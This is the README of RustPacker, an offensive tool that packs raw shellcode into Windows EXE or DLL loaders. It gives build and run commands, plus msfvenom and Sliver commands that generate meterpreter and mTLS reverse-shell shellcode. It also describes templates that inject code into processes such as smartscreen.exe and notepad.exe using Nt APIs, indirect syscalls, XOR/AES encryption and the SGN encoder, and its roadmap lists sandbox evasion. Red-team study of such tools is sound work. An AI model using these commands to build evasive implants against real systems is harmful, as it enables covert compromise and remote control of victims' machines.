Yes! Here with the common metasploit calc exec payload on a Windows 11 host, using the ntCRT template and AES. Last test on 21/12/2023.
Consider using Podman instead of Docker for security reasons. From any internet-connected OS with either Podman or Docker installed:
git clone https://github.com/Nariod/RustPacker.git
cd RustPacker/
podman build -t rustpacker -f Dockerfile
. This operation may take a while.- Paste your shellcode file in the
shared
folder, and create your first binary targeting a runningsmartscreen
process: podman run --rm -v $(pwd)/shared:/usr/src/RustPacker/shared:z rustpacker RustPacker -f shared/calc.raw -i syscrt -e aes -b exe -t smartscreen.exe
- Retrieve the output binary along with the Rust source files in
output_[RANDOM_NAME]
:target/x86_64-pc-windows-gnu/release/
For regular use, you can set an alias:
- On Linux host:
alias rustpacker='podman run --rm -v $(pwd)/shared:/usr/src/RustPacker/shared:z rustpacker RustPacker'
- Then:
rustpacker -f shared/calc.raw -i syscrt -e aes -b exe -t smartscreen.exe
RustPacker is compatible with any raw shellcode.
You can generate raw MSF shellcode using msfvenom's raw format. Ex:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=80 EXITFUNC=thread -f raw -o msf.bin
You can generate raw Sliver shellcode using Sliver's "--format shellcode". Ex:
generate --mtls 127.0.0.1:443 --format shellcode --os windows --evasion
- You can use Shikata Ga Nai (SGN) Sliver encoder if prompted. RustPacker templates now use RWX memory regions (not really OPSEC safe), which are required for SGN to work.
Consider using Podman instead of Docker for security reasons. From any internet-connected OS with either Podman or Docker installed:
git clone https://github.com/Nariod/RustPacker.git
cd RustPacker/
podman build -t rustpacker -f Dockerfile
- Paste your shellcode file in the
shared
folder podman run --rm -v $(pwd)/shared:/usr/src/RustPacker/shared:z rustpacker RustPacker -f shared/calc.raw -i ntcrt -e xor -b exe -t smartscreen.exe
- Retrieve the output binary along with the Rust source files in the
output_RANDOM_NAME
folder inshared
For regular use, you can set an alias:
- On Linux host:
alias rustpacker='podman run --rm -v $(pwd)/shared:/usr/src/RustPacker/shared:z rustpacker RustPacker'
- Then:
rustpacker -f shared/calc.raw -i ntcrt -e xor -b exe -t smartscreen.exe
Install dependencies:
sudo apt update && sudo apt upgrade -y
sudo apt install -y libssl-dev librust-openssl-dev musl-tools mingw-w64 cmake libxml2-dev
Install Rust:
- https://www.rust-lang.org/tools/install
source $HOME/.cargo/env
rustup target add x86_64-pc-windows-gnu
Run RustPacker:
git clone https://github.com/Nariod/RustPacker.git
cd RustPacker/
cargo run -- -f shared/calc.raw -i ntcrt -e xor -b exe -t smartscreen.exe
For now, you can choose from the following templates:
winCRT
, which injects your shellcode in a remote process using the following high-level API calls:OpenProcess
,VirtualAllocEx
,WriteProcessMemory
,VirtualProtectEx
,CreateRemoteThread
. You can supply the target process with-t
, defaults todllhost.exe
otherwise. Uses the official Windows crates.ntCRT
, which injects your shellcode in a remote process using the following low-level API calls:NtOpenProcess
,NtAllocateVirtualMemory
,NtWriteVirtualMemory
,NtProtectVirtualMemory
,NtCreateThreadEx
. You can supply the target process with-t
, defaults todllhost.exe
otherwise.ntAPC
, which executes your shellcode in a new process using the following low-levels API calls:NtAllocateVirtualMemory
,NtWriteVirtualMemory
,NtProtectVirtualMemory
,NtQueueApcThread
,NtTestAlert
.sysCRT
, which injects your shellcode in a remote process using indirect syscalls to the following low-level API:NtOpenProcess
,NtAllocateVirtualMemory
,NtWriteVirtualMemory
,NtProtectVirtualMemory
,NtCreateThreadEx
. You can supply the target process with-t
, defaults todllhost.exe
otherwise. Uses the rust-syscalls project for syscalls.winFIBER
, which executes your shellcode in a new process using the following high-level API calls:VirtualAlloc
,WriteProcessMemory
,VirtualProtect
,CreateFiber
,ConvertThreadToFiber
,SwitchToFiber
. Uses the official Windows crates. Thanks to Maldev Academy for the execution sequence with fibers !ntFIBER
, which executes your shellcode in a new process using the following low API calls:NtAllocateVirtualMemory
,NtWriteVirtualMemory
,NtProtectVirtualMemory
,CreateFiberEx
,ConvertThreadToFiber
,SwitchToFiber
. Uses the official Windows crates. Thanks to Maldev Academy for the execution sequence with fibers !sysFIBER
, which executes your shellcode in a new process using indirect syscalls the following low API calls:NtAllocateVirtualMemory
,NtWriteVirtualMemory
,NtProtectVirtualMemory
. Then, callsCreateFiberEx
,ConvertThreadToFiber
,SwitchToFiber
. Uses the official Windows crates. Thanks to Maldev Academy for the execution sequence with fibers !
All the templates are compatible with either XOR or AES encryption, and can generate an EXE or a DLL file. Templates that inject in remote processes are compatible with the -t
option to target the process of your choice.
If you want to pack your Sliver shellcode using the ntCRT
template with AES encryption, target notepad.exe
, and retrieve an EXE file:
- Generate your raw shellcode from Sliver
- Copy / paste your shellcode file in the
shared
folder of the Rustpacker project - Using Podman/Docker without alias:
podman run --rm -v $(pwd)/shared:/usr/src/RustPacker/shared:z rustpacker RustPacker -f shared/AMAZING_SLIVER.bin -i ntcrt -e aes -b exe -t notepad.exe
- Using Podman/Docker with an alias:
rustpacker -f shared/AMAZING_SLIVER.bin -i ntcrt -e aes -b exe -t notepad.exe
- Retrieve the output binary along with the Rust source files in the
output_[RANDOM_NAME]
:target/x86_64-pc-windows-gnu/release/
If you want to pack your Msfvenom shellcode using the ntAPC
template with XOR encryption, and retrieve a DLL file:
- Generate your raw shellcode from Msfvenom
- Copy / paste your shellcode file in the
shared
folder of the Rustpacker project - Using Podman/Docker without alias:
podman run --rm -v $(pwd)/shared:/usr/src/RustPacker/shared:z rustpacker RustPacker -f shared/msf.bin -i ntapc -e xor -b dll
- Using Podman/Docker with an alias:
rustpacker -f shared/msf.bin -i ntapc -e xor -b dll
- Retrieve the output binary along with the Rust source files in the
output_[RANDOM_NAME]
:target/x86_64-pc-windows-gnu/release/
If you want to specify a custom output directory and filename for the resulting binary:
- Add the
-o
option followed by the desired output directory path. - Example without alias:
podman run --rm -v $(pwd)/shared:/usr/src/RustPacker/shared:z rustpacker RustPacker -f shared/msf.bin -i ntapc -e xor -b dll -o shared/my_file.dll
- Example with alias:
rustpacker -f shared/msf.bin -i ntapc -e xor -b dll -o shared/my_file.dll
These templates are no longer available with RustPacker, but can be found in RustPacker/templates/OLD/
:
ct
, which executes your shellcode by spawning a process using the following API calls:VirtualAlloc, VirtualProtect, CreateThread, WaitForSingleObject
.crt
, which injects your shellcode in thedllhost.exe
process using the following API calls:OpenProcess, VirtualAllocEx, WriteProcessMemory, VirtualProtectEx, CreateRemoteThread
.
If you have some experience with Rust, you're more than welcome to help ! You can help by:
- Reviewing the code for mistakes / improvements
- Opening issues
- Contacting me on Discord for a more in depth review (nariod#4621)
- Port createThread Rust template
- Port createRemoteThread Rust template
- Debug binary file to Vec
- Debug compiler
- Packer POC
- Migrate to "std::include_bytes"
- Add xor
- Add AES
- Add Sliver SGN support
- Refactor code
- Write ntCRT template with Nt APIs
- Rewrite all templates using Nt APIs only
- Build dockerfile
- Strip output binaries
- Add string encryption option with litcrypt or other
- Add option to choose the target process to inject into
- Add sandbox evasion option
- Reduce cargo verbosity
- Generate random name for generated binary
- Add binary signing support
- Port ntCRT to sysCRT with syscalls
- Port ntAPC to sysAPC with syscalls
- Write detailed doc
- Support both EXE and DLL formats
- Add semaphore/mutex support to ensure only one instance of the shellcode is running
- Remove the annoying snake case warnings
- Bump Clap from v3 to v4
- Implement Maldev Academy smart XOR
- memN0ps for all his work
- The rust-syscalls project
- trickster0 for his OffensiveRust repo
- Rust discord
- StackOverflow
- https://github.com/postrequest/link
- Maldev Academy for the Fibers shellcode execution method
- craiyon for the Rustpacker logo
Usage of anything presented in this repo to attack targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.